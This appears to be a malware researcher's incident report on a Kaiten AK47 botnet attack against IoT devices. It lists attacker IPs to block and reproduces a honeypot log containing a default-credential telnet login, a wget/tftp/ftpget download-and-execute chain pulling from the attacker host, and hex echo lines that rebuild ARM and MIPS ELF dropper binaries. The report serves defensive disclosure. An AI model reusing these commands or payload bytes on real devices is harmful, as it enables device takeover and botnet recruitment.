This is the threat analysis report for the case of KAITEN AK47 botnet attack w/Mod-Telnet-Scanner & Echo-loader (pushed hex-strings)

MMD20200522-kaiten-ak47-freak.md

Incident information

This is the incident analysis report of a recent wide-spread ITW ELF bot aiming IoT devices. The malware used in the attack is KAITEN AK47(a Mod-Telnet-Scanner) & Echo-loader spreading hexstrings pushed to targeted networks, orchestrated by an ex-LizardSquad member we know. The highlight of analysis shown in below, please scroll the bar horizontally to view ong strings entries.

As urgency, we summarized the advisary's infrastructure as below ; to block (C2 in IRC protocol, AK-47 scanner servers and the HTTP payload service)

          (Attacker's infrastructure)

196.53. 114.199 | AS50673 | 196.53.114.0/24 | SERVERIUS-AS    | NL |
204.11. 49.132  | AS30176 | 204.11.48.0/21  | AS-PRIORITYCOLO | CA |

Attack records

Recorded adversary's attack log:

          (the incoming attack pattern)

2020-05-21|14:37:29|196.53 .114.199| login attempt [root/xc3511] succeeded
2020-05-21|14:37:30|196.53 .114.199| enable
2020-05-21|14:37:30|196.53 .114.199| system
2020-05-21|14:37:30|196.53 .114.199| shell
2020-05-21|14:37:30|196.53 .114.199| sh
2020-05-21|14:37:30|196.53 .114.199| echo -e '\x41\x4b\x34\x37'
2020-05-21|14:37:32|196.53 .114.199| cd /tmp || cd /home/$USER || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://196[.]53[.]114[.]199/update.sh; busybox wget hxxp://196[.]53[.]114[.]199/update.sh; tftp -r update.sh -g 196[.]53[.]114[.]199; busybox tftp -r update.sh -g 196[.]53[.]114[.]199; ftpget -v -u anonymous -p anonymous -P 21 196.53.114.199 update.sh update.sh; busybox ftpget -v -u anonymous -p anonymous -P 21 196.53.114.199 update.sh update.sh; chmod 777 update.sh; busybox chmod 777 update.sh; sh update.sh; rm -rf update.sh
2020-05-21|14:37:47|196.53 .114.199| CMD: cat /proc/mounts||busybox cat /proc/mounts
2020-05-21|14:37:47|196.53 .114.199| CMD: echo -ne '\x7f\x45\x4c\x46\x01\x01\x01\x61\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x28\x00\x01\x00\x00\x00\x1c\x83\x00\x00\x34\x00\x00\x00\xcc\x03\x00\x00\x02\x02\x00\x00\x34\x00\x20\x00\x02\x00\x28\x00\x05\x00\x04\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\xac\x03\x00\x00\xac\x03\x00\x00\x05\x00\x00\x00\x00\x80\x00\x00\x01\x00\x00\x00\xac\x03\x00\x00\xac\x03\x01\x00\xac\x03\x01\x00\x00\x00\x00\x00\x08\x00\x00\x00\x06\x00\x00\x00\x00\x80\x00\x00\x01\x18\xa0\xe1\xff\x18\x01\xe2\x00\x1c\x81\xe1' > GKMSPhsZvn
2020-05-21|14:37:47|196.53 .114.199| CMD: echo -ne '\xff\x30\x03\xe2\x02\x24\xa0\xe1\x03\x10\x81\xe1\xff\x2c\x02\xe2\x01\x20\x82\xe1\xff\x3c\x02\xe2\xff\x08\x02\xe2\x03\x34\xa0\xe1\x20\x04\xa0\xe1\x22\x0c\x80\xe1\x02\x3c\x83\xe1\x00\x00\x83\xe1\x0e\xf0\xa0\xe1\x00\x10\xa0\xe1\x00\x00\x9f\xe5\x97\x00\x00\xea\x01\x00\x90\x00\x00\x10\xa0\xe1\x00\x00\x9f\xe5\x93\x00\x00\xea\x06\x00\x90\x00\x01\xc0\xa0\xe1\x00\x10\xa0\xe1\x08\x00\x9f\xe5\x02\x30\xa0\xe1\x0c\x20\xa0\xe1\x8c\x00\x00\xea\x05\x00\x90\x00\x04\xe0\x2d\xe5\x0c\xd0\x4d\xe2\x07\x00\x8d\xe8\x03\x10\xa0\xe3' >> GKMSPhsZvn
2020-05-21|14:37:47|196.53 .114.199| CMD: echo -ne '\x0d\x20\xa0\xe1\x08\x00\x9f\xe5\x84\x00\x00\xeb\x0c\xd0\x8d\xe2\x00\x80\xbd\xe8\x66\x00\x90\x00\x01\xc0\xa0\xe1\x00\x10\xa0\xe1\x08\x00\x9f\xe5\x02\x30\xa0\xe1\x0c\x20\xa0\xe1\x7b\x00\x00\xea\x04\x00\x90\x00\x01\xc0\xa0\xe1\x00\x10\xa0\xe1\x08\x00\x9f\xe5\x02\x30\xa0\xe1\x0c\x20\xa0\xe1\x74\x00\x00\xea\x03\x00\x90\x00\x04\xe0\x2d\xe5\x0c\xd0\x4d\xe2\x07\x00\x8d\xe8\x01\x10\xa0\xe3\x0d\x20\xa0\xe1\x08\x00\x9f\xe5\x6c\x00\x00\xeb\x0c\xd0\x8d\xe2\x00\x80\xbd\xe8\x66\x00\x90\x00\xf0\x41\x2d\xe9\x74\x41\x9f\xe5' >> GKMSPhsZvn
2020-05-21|14:37:47|196.53 .114.199| CMD: echo -ne '\x94\xd0\x4d\xe2\x00\x00\x00\xea\x01\x40\x84\xe2\x00\x60\xd4\xe5\x00\x00\x56\xe3\xfb\xff\xff\x1a\x58\x31\x9f\xe5\x58\x11\x9f\xe5\x06\x20\xa0\xe3\x01\x00\xa0\xe3\x04\x80\x63\xe0\xd9\xff\xff\xeb\x02\x40\xa0\xe3\x50\xc0\xa0\xe3\xc7\x30\xa0\xe3\x35\x10\xa0\xe3\x72\x20\xa0\xe3\xc4\x00\xa0\xe3\x83\xc0\xcd\xe5\x80\x40\xcd\xe5\x81\x60\xcd\xe5\x82\x60\xcd\xe5\xa5\xff\xff\xeb\x1c\x11\x9f\xe5\x84\x00\x8d\xe5\x18\x21\x9f\xe5\x18\x01\x9f\xe5\xb8\xff\xff\xeb\x01\x10\xa0\xe3\x00\x70\xa0\xe1\x06\x20\xa0\xe1\x04\x00\xa0\xe1' >> GKMSPhsZvn
2020-05-21|14:37:47|196.53 .114.199| CMD: echo -ne '\xd2\xff\xff\xeb\x01\x00\x70\xe3\x01\x00\x77\x13\x00\x50\xa0\xe1\x01\x00\xa0\x03\xa6\xff\xff\x0b\x05\x00\xa0\xe1\x80\x10\x8d\xe2\x10\x20\xa0\xe3\xb1\xff\xff\xeb\x00\x40\x50\xe2\x05\x00\x00\xaa\x01\x00\xa0\xe3\xd0\x10\x9f\xe5\x04\x20\xa0\xe3\xb5\xff\xff\xeb\x00\x00\x64\xe2\x9a\xff\xff\xeb\x1d\x40\x88\xe2\x05\x00\xa0\xe1\xb8\x10\x9f\xe5\x04\x20\xa0\xe1\xae\xff\xff\xeb\x04\x00\x50\xe1\x03\x00\xa0\x13\x92\xff\xff\x1b\x06\x40\xa0\xe1\x93\x10\x8d\xe2\x01\x20\xa0\xe3\x05\x00\xa0\xe1\xad\xff\xff\xeb\x01\x00\x50\xe3' >> GKMSPhsZvn
2020-05-21|14:37:47|196.53 .114.199| CMD: echo -ne '\x04\x00\xa0\xe3\x8a\xff\xff\x1b\x93\x30\xdd\xe5\x04\x44\x83\xe1\x7c\x30\x9f\xe5\x03\x00\x54\xe1\xf3\xff\xff\x1a\x0d\x10\xa0\xe1\x80\x20\xa0\xe3\x05\x00\xa0\xe1\xa1\xff\xff\xeb\x00\x20\x50\xe2\x0d\x40\xa0\xe1\x0d\x10\xa0\xe1\x07\x00\xa0\xe1\x01\x00\x00\xda\x94\xff\xff\xeb\xf4\xff\xff\xea\x05\x00\xa0\xe1\x7c\xff\xff\xeb\x07\x00\xa0\xe1\x7a\xff\xff\xeb\x38\x10\x9f\xe5\x04\x20\xa0\xe3\x01\x00\xa0\xe3\x8b\xff\xff\xeb\x05\x00\xa0\xe3\x70\xff\xff\xeb\x94\xd0\x8d\xe2\xf0\x81\xbd\xe8\x5c\x83\x00\x00\x60\x83\x00\x00' >> GKMSPhsZvn
2020-05-21|14:37:47|196.53 .114.199| CMD: echo -ne '\x41\x02\x00\x00\xff\x01\x00\x00\x68\x83\x00\x00\x74\x83\x00\x00\x7c\x83\x00\x00\x0a\x0d\x0a\x0d\xa4\x83\x00\x00\x95\xff\xff\xea\x70\x40\x2d\xe9\x10\x40\x8d\xe2\x70\x00\x94\xe8\x71\x00\x90\xef\x01\x0a\x70\xe3\x00\x40\xa0\xe1\x70\x80\xbd\x98\x03\x00\x00\xeb\x00\x30\x64\xe2\x00\x30\x80\xe5\x00\x00\xe0\xe3\x70\x80\xbd\xe8\x00\x00\x9f\xe5\x0e\xf0\xa0\xe1\xac\x03\x01\x00\x61\x72\x6d\x00\x4d\x49\x52\x41\x49\x0a\x00\x00\x6b\x4a\x7a\x62\x48\x47\x62\x55\x45\x46\x00\x00\x4e\x49\x46\x0a\x00\x00\x00\x00\x47\x45\x54\x20' >> GKMSPhsZvn
2020-05-21|14:37:47|196.53 .114.199| CMD: echo -ne '\x2f\x62\x69\x6e\x73\x2f\x69\x67\x4c\x48\x76\x69\x6a\x7a\x62\x46\x61\x72\x6d\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x0d\x0a\x00\x00\x00\x00\x46\x49\x4e\x0a\x00\x00\x00\x00\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x72\x6f\x64\x61\x74\x61\x00\x2e\x62\x73\x73\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00' >> GKMSPhsZvn
2020-05-21|14:37:47|196.53 .114.199| CMD: echo -ne '\x74\x80\x00\x00\x74\x00\x00\x00\xe8\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x32\x00\x00\x00\x5c\x83\x00\x00\x5c\x03\x00\x00\x50\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x08\x00\x00\x00\x03\x00\x00\x00\xac\x03\x01\x00\xac\x03\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x03\x00\x00' >> GKMSPhsZvn
2020-05-21|14:37:47|196.53 .114.199| CMD: echo -ne '\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00' >> GKMSPhsZvn
2020-05-21|14:37:47|196.53 .114.199| CMD: chmod 777 GKMSPhsZvn||busybox chmod 777 GKMSPhsZvn
2020-05-21|14:37:47|196.53 .114.199| CMD: ./GKMSPhsZvn
2020-05-21|14:37:50|196.53 .114.199| CMD: rm -rf ./GKMSPhsZvn
2020-05-21|14:37:51|196.53 .114.199| CMD: ./kJzbHGbUEF
2020-05-21|14:37:52|196.53 .114.199| CMD: rm -rf ./kJzbHGbUEF
2020-05-21|14:37:52|196.53 .114.199| CMD: echo -ne '\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x28\x00\x01\x00\x00\x00\x8c\x83\x00\x00\x34\x00\x00\x00\xa0\x04\x00\x00\x02\x00\x00\x04\x34\x00\x20\x00\x03\x00\x28\x00\x07\x00\x06\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x50\x04\x00\x00\x50\x04\x00\x00\x05\x00\x00\x00\x00\x80\x00\x00\x01\x00\x00\x00\x50\x04\x00\x00\x50\x04\x01\x00\x50\x04\x01\x00\x0c\x00\x00\x00\x14\x00\x00\x00\x06\x00\x00\x00\x00\x80\x00\x00\x51\xe5\x74\x64\x00\x00\x00\x00\x00\x00\x00\x00' > GKMSPhsZvn
2020-05-21|14:37:52|196.53 .114.199| CMD: echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x38\x83\xe1\x00\x3c\x83\xe1\x02\x34\x83\xe1\x03\x0c\xa0\xe1\x02\x08\x80\xe1\xff\x28\x03\xe2\x22\x04\x80\xe1\x23\x0c\x80\xe1\x1e\xff\x2f\xe1\x04\xe0\x2d\xe5\x00\x10\xa0\xe1\x04\xd0\x4d\xe2\x01\x00\xa0\xe3\xad\x00\x00\xeb\x04\xd0\x8d\xe2\x04\xe0\x9d\xe4\x1e\xff\x2f\xe1\x04\xe0\x2d\xe5\x00\x10\xa0\xe1\x04\xd0\x4d\xe2\x06\x00\xa0\xe3\xa5\x00\x00\xeb\x04\xd0\x8d\xe2\x04\xe0\x9d\xe4' >> GKMSPhsZvn
2020-05-21|14:37:52|196.53 .114.199| CMD: echo -ne '\x1e\xff\x2f\xe1\x04\xe0\x2d\xe5\x01\xc0\xa0\xe1\x02\x30\xa0\xe1\x00\x10\xa0\xe1\x04\xd0\x4d\xe2\x0c\x20\xa0\xe1\x05\x00\xa0\xe3\x9a\x00\x00\xeb\x04\xd0\x8d\xe2\x04\xe0\x9d\xe4\x1e\xff\x2f\xe1\x04\xe0\x2d\xe5\x01\xc0\xa0\xe1\x02\x30\xa0\xe1\x00\x10\xa0\xe1\x04\xd0\x4d\xe2\x0c\x20\xa0\xe1\x0c\x00\x9f\xe5\x8f\x00\x00\xeb\x04\xd0\x8d\xe2\x04\xe0\x9d\xe4\x1e\xff\x2f\xe1\x1b\x01\x00\x00\x04\xe0\x2d\xe5\x01\xc0\xa0\xe1\x02\x30\xa0\xe1\x00\x10\xa0\xe1\x04\xd0\x4d\xe2\x0c\x20\xa0\xe1\x04\x00\xa0\xe3\x83\x00\x00\xeb' >> GKMSPhsZvn
2020-05-21|14:37:52|196.53 .114.199| CMD: echo -ne '\x04\xd0\x8d\xe2\x04\xe0\x9d\xe4\x1e\xff\x2f\xe1\x04\xe0\x2d\xe5\x01\xc0\xa0\xe1\x02\x30\xa0\xe1\x00\x10\xa0\xe1\x04\xd0\x4d\xe2\x0c\x20\xa0\xe1\x03\x00\xa0\xe3\x78\x00\x00\xeb\x04\xd0\x8d\xe2\x04\xe0\x9d\xe4\x1e\xff\x2f\xe1\x04\xe0\x2d\xe5\x01\xc0\xa0\xe1\x02\x30\xa0\xe1\x00\x10\xa0\xe1\x04\xd0\x4d\xe2\x0c\x20\xa0\xe1\x0c\x00\x9f\xe5\x6d\x00\x00\xeb\x04\xd0\x8d\xe2\x04\xe0\x9d\xe4\x1e\xff\x2f\xe1\x19\x01\x00\x00\xf0\x41\x2d\xe9\x74\x31\x9f\xe5\x98\xd0\x4d\xe2\x00\x80\xa0\xe3\x00\x00\x00\xea\x01\x80\x88\xe2' >> GKMSPhsZvn
2020-05-21|14:37:52|196.53 .114.199| CMD: echo -ne '\x01\x60\x53\xe5\x00\x00\x56\xe3\x01\x30\x83\xe2\xfa\xff\xff\x1a\x54\x11\x9f\xe5\x06\x20\xa0\xe3\x01\x00\xa0\xe3\xcf\xff\xff\xeb\x02\xc0\xa0\xe3\xc7\x30\xa0\xe3\x35\x10\xa0\xe3\x72\x20\xa0\xe3\xb4\xc8\xcd\xe1\xc4\x00\xa0\xe3\x05\xca\xa0\xe3\xb6\xc8\xcd\xe1\x96\xff\xff\xeb\x24\x11\x9f\xe5\x88\x00\x8d\xe5\x20\x21\x9f\xe5\x20\x01\x9f\xe5\xaa\xff\xff\xeb\x01\x10\xa0\xe3\x00\x70\xa0\xe1\x06\x20\xa0\xe1\x02\x00\xa0\xe3\xd2\xff\xff\xeb\x01\x00\x70\xe3\x01\x00\x77\x13\x00\x50\xa0\xe1\x01\x00\xa0\x03\x90\xff\xff\x0b' >> GKMSPhsZvn
2020-05-21|14:37:52|196.53 .114.199| CMD: echo -ne '\x05\x00\xa0\xe1\x84\x10\x8d\xe2\x10\x20\xa0\xe3\xa7\xff\xff\xeb\x00\x40\x50\xe2\x05\x00\x00\xaa\x01\x00\xa0\xe3\xd8\x10\x9f\xe5\x04\x20\xa0\xe3\xad\xff\xff\xeb\x00\x00\x64\xe2\x84\xff\xff\xeb\x1d\x40\x88\xe2\x05\x00\xa0\xe1\xc0\x10\x9f\xe5\x04\x20\xa0\xe1\xa6\xff\xff\xeb\x04\x00\x50\xe1\x03\x00\xa0\x13\x7c\xff\xff\x1b\xac\x80\x9f\xe5\x06\x40\xa0\xe1\x97\x60\x8d\xe2\x06\x10\xa0\xe1\x01\x20\xa0\xe3\x05\x00\xa0\xe1\xa7\xff\xff\xeb\x01\x00\x50\xe3\x04\x00\xa0\xe3\x72\xff\xff\x1b\x97\x30\xdd\xe5\x04\x44\x83\xe1' >> GKMSPhsZvn
2020-05-21|14:37:52|196.53 .114.199| CMD: echo -ne '\x08\x00\x54\xe1\xf4\xff\xff\x1a\x04\x40\x8d\xe2\x04\x10\xa0\xe1\x80\x20\xa0\xe3\x05\x00\xa0\xe1\x9b\xff\xff\xeb\x00\x20\x50\xe2\x04\x10\xa0\xe1\x07\x00\xa0\xe1\x01\x00\x00\xda\x8b\xff\xff\xeb\xf5\xff\xff\xea\x05\x00\xa0\xe1\x69\xff\xff\xeb\x07\x00\xa0\xe1\x67\xff\xff\xeb\x3c\x10\x9f\xe5\x04\x20\xa0\xe3\x01\x00\xa0\xe3\x82\xff\xff\xeb\x05\x00\xa0\xe3\x59\xff\xff\xeb\x98\xd0\x8d\xe2\xf0\x41\xbd\xe8\x1e\xff\x2f\xe1\xfd\x83\x00\x00\x04\x84\x00\x00\x41\x02\x00\x00\xff\x01\x00\x00\x0c\x84\x00\x00\x18\x84\x00\x00' >> GKMSPhsZvn
2020-05-21|14:37:52|196.53 .114.199| CMD: echo -ne '\x20\x84\x00\x00\x0a\x0d\x0a\x0d\x48\x84\x00\x00\x95\xff\xff\xea\x0d\xc0\xa0\xe1\xf0\x00\x2d\xe9\x00\x70\xa0\xe1\x01\x00\xa0\xe1\x02\x10\xa0\xe1\x03\x20\xa0\xe1\x78\x00\x9c\xe8\x00\x00\x00\xef\xf0\x00\xbd\xe8\x01\x0a\x70\xe3\x0e\xf0\xa0\x31\xff\xff\xff\xea\x10\x40\x2d\xe9\x00\x40\xa0\xe1\x04\x00\x00\xeb\x00\x40\x64\xe2\x00\x40\x80\xe5\x00\x00\xe0\xe3\x10\x40\xbd\xe8\x1e\xff\x2f\xe1\x0c\x30\x9f\xe5\x0c\x00\x9f\xe5\x03\x30\x8f\xe0\x00\x00\x83\xe0\x1e\xff\x2f\xe1\x60\x80\x00\x00\x0c\x00\x00\x00\x61\x72\x6d\x37' >> GKMSPhsZvn
2020-05-21|14:37:52|196.53 .114.199| CMD: echo -ne '\x00\x00\x00\x00\x4d\x49\x52\x41\x49\x0a\x00\x00\x6b\x4a\x7a\x62\x48\x47\x62\x55\x45\x46\x00\x00\x4e\x49\x46\x0a\x00\x00\x00\x00\x47\x45\x54\x20\x2f\x62\x69\x6e\x73\x2f\x69\x67\x4c\x48\x76\x69\x6a\x7a\x62\x46\x61\x72\x6d\x37\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x0d\x0a\x00\x00\x00\x46\x49\x4e\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x41\x0f\x00\x00\x00\x61\x65\x61\x62\x69\x00\x01\x05\x00\x00\x00\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x72\x6f' >> GKMSPhsZvn
2020-05-21|14:37:53|196.53 .114.199| CMD: echo -ne '\x64\x61\x74\x61\x00\x2e\x67\x6f\x74\x00\x2e\x62\x73\x73\x00\x2e\x41\x52\x4d\x2e\x61\x74\x74\x72\x69\x62\x75\x74\x65\x73\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\xa0\x80\x00\x00\xa0\x00\x00\x00\x5c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x32\x00\x00\x00\xfc\x83\x00\x00' >> GKMSPhsZvn
2020-05-21|14:37:53|196.53 .114.199| CMD: echo -ne '\xfc\x03\x00\x00\x54\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x50\x04\x01\x00\x50\x04\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x1e\x00\x00\x00\x08\x00\x00\x00\x03\x00\x00\x00\x5c\x04\x01\x00\x5c\x04\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x23\x00\x00\x00\x03\x00\x00\x70\x00\x00\x00\x00\x00\x00\x00\x00\x5c\x04\x00\x00\x10\x00\x00\x00' >> GKMSPhsZvn
2020-05-21|14:37:53|196.53 .114.199| CMD: echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6c\x04\x00\x00\x33\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00' >> GKMSPhsZvn
2020-05-21|14:37:53|196.53 .114.199| CMD: chmod 777 GKMSPhsZvn||busybox chmod 777 GKMSPhsZvn
2020-05-21|14:37:53|196.53 .114.199| CMD: ./GKMSPhsZvn
2020-05-21|14:37:56|196.53 .114.199| CMD: rm -rf ./GKMSPhsZvn
2020-05-21|14:37:56|196.53 .114.199| CMD: ./kJzbHGbUEF
2020-05-21|14:37:57|196.53 .114.199| CMD: rm -rf ./kJzbHGbUEF
2020-05-21|14:37:57|196.53 .114.199| CMD: echo -ne '\x7f\x45\x4c\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00\x00\x00\x01\x00\x40\x04\xc0\x00\x00\x00\x34\x00\x00\x06\xc8\x00\x00\x10\x07\x00\x34\x00\x20\x00\x03\x00\x28\x00\x07\x00\x06\x00\x00\x00\x01\x00\x00\x00\x00\x00\x40\x00\x00\x00\x40\x00\x00\x00\x00\x06\x34\x00\x00\x06\x34\x00\x00\x00\x05\x00\x01\x00\x00\x00\x00\x00\x01\x00\x00\x06\x40\x00\x44\x06\x40\x00\x44\x06\x40\x00\x00\x00\x54\x00\x00\x00\x70\x00\x00\x00\x06\x00\x01\x00\x00\x64\x74\xe5\x51\x00\x00\x00\x00\x00\x00\x00\x00' > GKMSPhsZvn
2020-05-21|14:37:57|196.53 .114.199| CMD: echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x30\xa5\x00\xff\x00\x05\x2c\x00\x00\x04\x26\x00\x00\x85\x20\x25\x30\xc2\x00\xff\x30\xe7\x00\xff\x00\x87\x20\x25\x00\x02\x12\x00\x03\xe0\x00\x08\x00\x44\x10\x25\x3c\x1c\x00\x05\x27\x9c\x85\x68\x03\x99\xe0\x21\x8f\x99\x80\x5c\x00\x80\x28\x21\x03\x20\x00\x08\x24\x04\x0f\xa1\x3c\x1c\x00\x05\x27\x9c\x85\x4c\x03\x99\xe0\x21\x8f\x99\x80\x5c\x00\x80\x28\x21\x03\x20\x00\x08\x24\x04\x0f\xa6' >> GKMSPhsZvn
2020-05-21|14:37:57|196.53 .114.199| CMD: echo -ne '\x3c\x1c\x00\x05\x27\x9c\x85\x30\x03\x99\xe0\x21\x00\xa0\x10\x21\x8f\x99\x80\x5c\x00\xc0\x38\x21\x00\x80\x28\x21\x00\x40\x30\x21\x03\x20\x00\x08\x24\x04\x0f\xa5\x3c\x1c\x00\x05\x27\x9c\x85\x08\x03\x99\xe0\x21\x27\xbd\xff\xd0\xaf\xbf\x00\x28\xaf\xbc\x00\x10\x8f\x99\x80\x5c\xaf\xa4\x00\x18\xaf\xa5\x00\x1c\xaf\xa6\x00\x20\x24\x04\x10\x06\x27\xa6\x00\x18\x03\x20\xf8\x09\x24\x05\x00\x03\x8f\xbc\x00\x10\x8f\xbf\x00\x28\x00\x00\x00\x00\x03\xe0\x00\x08\x27\xbd\x00\x30\x3c\x1c\x00\x05\x27\x9c\x84\xbc\x03\x99\xe0\x21' >> GKMSPhsZvn
2020-05-21|14:37:57|196.53 .114.199| CMD: echo -ne '\x00\xa0\x10\x21\x8f\x99\x80\x5c\x00\xc0\x38\x21\x00\x80\x28\x21\x00\x40\x30\x21\x03\x20\x00\x08\x24\x04\x0f\xa4\x3c\x1c\x00\x05\x27\x9c\x84\x94\x03\x99\xe0\x21\x00\xa0\x10\x21\x8f\x99\x80\x5c\x00\xc0\x38\x21\x00\x80\x28\x21\x00\x40\x30\x21\x03\x20\x00\x08\x24\x04\x0f\xa3\x3c\x1c\x00\x05\x27\x9c\x84\x6c\x03\x99\xe0\x21\x27\xbd\xff\xd0\xaf\xbf\x00\x28\xaf\xbc\x00\x10\x8f\x99\x80\x5c\xaf\xa4\x00\x18\xaf\xa5\x00\x1c\xaf\xa6\x00\x20\x24\x04\x10\x06\x27\xa6\x00\x18\x03\x20\xf8\x09\x24\x05\x00\x01\x8f\xbc\x00\x10' >> GKMSPhsZvn
2020-05-21|14:37:57|196.53 .114.199| CMD: echo -ne '\x8f\xbf\x00\x28\x00\x00\x00\x00\x03\xe0\x00\x08\x27\xbd\x00\x30\x3c\x1c\x00\x05\x27\x9c\x84\x20\x03\x99\xe0\x21\x27\xbd\xff\x38\xaf\xbf\x00\xc0\xaf\xb3\x00\xbc\xaf\xb2\x00\xb8\xaf\xb1\x00\xb4\xaf\xb0\x00\xb0\xaf\xbc\x00\x10\x8f\x82\x80\x18\x00\x00\x00\x00\x24\x50\x05\xe0\x82\x02\x00\x00\x00\x00\x00\x00\x14\x40\xff\xfd\x26\x10\x00\x01\x26\x10\xff\xff\x8f\x85\x80\x18\x8f\x82\x80\x18\x8f\x99\x80\x48\x24\xa5\x05\xe8\x24\x04\x00\x01\x24\x06\x00\x06\x24\x42\x05\xe0\x03\x20\xf8\x09\x02\x02\x98\x23\x8f\xbc\x00\x10' >> GKMSPhsZvn
2020-05-21|14:37:57|196.53 .114.199| CMD: echo -ne '\x24\x02\x00\x02\x8f\x99\x80\x4c\xa7\xa2\x00\x1c\x24\x02\x00\x50\x24\x07\x00\xc7\x24\x04\x00\xc4\x24\x05\x00\x35\x24\x06\x00\x72\x03\x20\xf8\x09\xa7\xa2\x00\x1e\x8f\xbc\x00\x10\x24\x05\x03\x01\x8f\x84\x80\x18\x8f\x99\x80\x60\x24\x84\x05\xf0\x24\x06\x01\xff\x03\x20\xf8\x09\xaf\xa2\x00\x20\x8f\xbc\x00\x10\x24\x04\x00\x02\x8f\x99\x80\x50\x24\x05\x00\x02\x00\x00\x30\x21\x03\x20\xf8\x09\x00\x40\x90\x21\x00\x40\x88\x21\x24\x02\xff\xff\x8f\xbc\x00\x10\x12\x22\x00\x03\x00\x00\x00\x00\x16\x42\x00\x07\x00\x00\x00\x00' >> GKMSPhsZvn
2020-05-21|14:37:57|196.53 .114.199| CMD: echo -ne '\x8f\x99\x80\x54\x00\x00\x00\x00\x03\x20\xf8\x09\x24\x04\x00\x01\x8f\xbc\x00\x10\x00\x00\x00\x00\x8f\x99\x80\x44\x02\x20\x20\x21\x27\xa5\x00\x1c\x03\x20\xf8\x09\x24\x06\x00\x10\x8f\xbc\x00\x10\x04\x41\x00\x0f\x00\x40\x80\x21\x8f\x85\x80\x18\x8f\x99\x80\x48\x24\xa5\x05\xfc\x24\x04\x00\x01\x03\x20\xf8\x09\x24\x06\x00\x04\x8f\xbc\x00\x10\x00\x00\x00\x00\x8f\x99\x80\x54\x00\x00\x00\x00\x03\x20\xf8\x09\x00\x10\x20\x23\x8f\xbc\x00\x10\x00\x00\x00\x00\x8f\x85\x80\x18\x8f\x99\x80\x48\x26\x70\x00\x1d\x24\xa5\x06\x04' >> GKMSPhsZvn
2020-05-21|14:37:57|196.53 .114.199| CMD: echo -ne '\x02\x20\x20\x21\x03\x20\xf8\x09\x02\x00\x30\x21\x8f\xbc\x00\x10\x10\x50\x00\x07\x00\x00\x80\x21\x8f\x99\x80\x54\x00\x00\x00\x00\x03\x20\xf8\x09\x24\x04\x00\x03\x8f\xbc\x00\x10\x00\x00\x80\x21\x8f\x99\x80\x38\x02\x20\x20\x21\x27\xa5\x00\x18\x03\x20\xf8\x09\x24\x06\x00\x01\x8f\xbc\x00\x10\x24\x03\x00\x01\x8f\x99\x80\x54\x10\x43\x00\x04\x24\x04\x00\x04\x03\x20\xf8\x09\x00\x00\x00\x00\x8f\xbc\x00\x10\x83\xa3\x00\x18\x00\x10\x12\x00\x00\x43\x80\x25\x3c\x02\x0d\x0a\x34\x42\x0d\x0a\x16\x02\xff\xed\x00\x00\x00\x00' >> GKMSPhsZvn
